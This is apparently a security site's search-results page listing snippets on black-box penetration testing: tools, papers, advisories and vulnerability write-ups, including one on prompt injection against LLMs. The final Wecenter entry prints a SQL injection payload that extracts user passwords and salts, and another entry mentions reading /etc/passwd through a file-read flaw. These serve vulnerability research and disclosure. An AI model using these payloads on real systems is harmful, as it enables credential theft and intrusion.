31 matches found
VibeHacking
👾 Welcome to Vibe Hacking By BlackPC, Vine & Foxxino Inc...
Black_Box-Penetration-Testing
BlackBox-Penetration-Testing Black-box penetration test again...
AutoPentest: Enhancing Vulnerability Management with Autonomous LLM Agents
A recent area of increasing research is the use of Large Language Models LLMs in penetration testing, which promises to reduce costs and thus allow for higher frequency. We conduct a review of related work, identifying best practices and common evaluation issues. We then present AutoPentest, an...
OET: Optimization-Based Prompt Injection Evaluation Toolkit
Large Language Models LLMs have demonstrated remarkable capabilities in natural language understanding and generation, enabling their widespread adoption across various domains. However, their susceptibility to prompt injection attacks poses significant security risks, as adversarial inputs can...
GHSA-86H2-2G4G-29QX avo possible unsafe reflection / partial DoS vulnerability
Summary The polymorphic field type stores the classes to operate on when updating a record with user input, and does not validate them in the back end. This can lead to unexpected behavior, remote code execution, or application crashes when viewing a manipulated record. Details After reviewing th...
What is an External Penetration Test?
A penetration test also known as a pentest is a security assessment that simulates the activities of real-world attackers to identify security holes in your IT systems or applications. The aim of the test is to understand what vulnerabilities you have, how they could be exploited, and what the...
Dynamic analysis of firmware components in IoT devices
Among the various offensive security techniques, vulnerability assessment takes priority when it comes to analyzing the security of IoT/IIoT devices. In most cases, such devices are analyzed using the black box testing approach, in which the researcher has virtually no knowledge about the object ...
Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware
CVE-2021-44228Apache Log4j Remote Code Execution) all log...
Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware
CVE-2021-44228Apache Log4j Remote Code Execution) all log...
Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware
Join Community Telegram CVE-2021-4...
FormatFuzzer - A Framework For High-Efficiency, High-Quality Generation And Parsing Of Binary Inputs
FormatFuzzer is a framework for high-efficiency, high-quality generation and parsing of binary inputs. It takes a binary template that describes the format of a binary input and generates an executable that produces and parses the given binary format. From a binary template for GIF, for instance,...
The cloud is beige - The demise of black box testing
Black-box penetration testing is dead. Id question why it is even a consideration. Its of limited and dubious value in almost any context. Wait, wait… I didnt mean that. Put down the pitchforks and torches, development and QA teams, Im only talking about black-box penetration testing. Yes,...
vaeThink v1. 0. 1 code execution vulnerability mining analysis-vulnerability warning-the black bar safety net
0x01 introduction This article is for a niche CMS(vaeThink v1. 0. 1 for analysis, code execution vulnerability discovery and audit process of the record, the CMS is based on ThinkPHP5 development. As a code audit entry rookie, also want to be able to practice and learn the process of recording an...
如何针对使用HTTP的.NET Remoting finding and using deserialization vulnerability-vulnerability warning-the black bar safety net
One, overview In the NCC Group and most recent safety assessment, 我发现了一个.NET v2. 0 app, 该应用程序使用.NET Remoting by HTTP to send the SOAP request to the other server to communicate. In the application of the anti-compiled, I realized that the server has TypeFilterLevel is set to Full, this is very...
LightBulb Framework - Tools For Auditing WAFS
LightBulb is an open source python framework for auditing web application firewalls and filters. Synopsis The framework consists of two main algorithms: GOFA : An active learning algorithm that infers symbolic representations of automata in the standard membership/equivalence query model. Active...
Shopify: myshopify.com domain takeover
Hello Shopify Security Team, I just received your email and I'm sorry for any inconvenience. Yes, it was me. Basically, I just tried to audit your website using some black box testing. Unfortunately, I didn't read about those guidelines, such as creating a store on https://partners.shopify.com/ a...
CVE-2017-0199: in-depth analysis of the Microsoft Office RTF vulnerability-vulnerability warning-the black bar safety net
0x00 Preface Recently, researchers also found a number of CVE-2017-0199 vulnerability of the sample. Although the Microsoft in this year 4 month has been released for the vulnerability the patch, but since its use is relatively simple, worldwide usage is still very high, here to share some of the...
BFAC - Backup File Artifacts Checker
An automated tool that checks for backup artifacts that may discloses the web-application's source code. \ \ \ | | /| || / | / / | | || | | | | || | | \ \ | | || | | | | || /\ |/ / |/ |/ |/ -:::Backup File Artifacts Checker:::- An automated tool that checks for backup artifacts that may...
An arbitrary file read vulnerability recorded-vulnerability warning-the black bar safety net
Black box testing Black-box testing found that an interface exist arbitrary file read vulnerability. ! "" The preferred determination is file read or file contains, because filegetcontent“/etc/passwd”include“/etc/passwd”black box view of the performance may be the same. And the file contains is c...
Wecenter最新版注入之二(黑盒测试技巧)
简要描述: 无视GPC注入 详细说明: 设置useragent 注入语句为 ' andselect 1 fromselect count,concatselect concatpassword,0x23,salt,0x23 from awsusers limit 0,1,floorrand02x from informationschema.tables group by xa 然后挂着页面几分钟 再去访问任意页面就可以了 可以看到报错了 Database error ------ SQL: UPDATE awsusersonline SET uid = '2', lastactive ...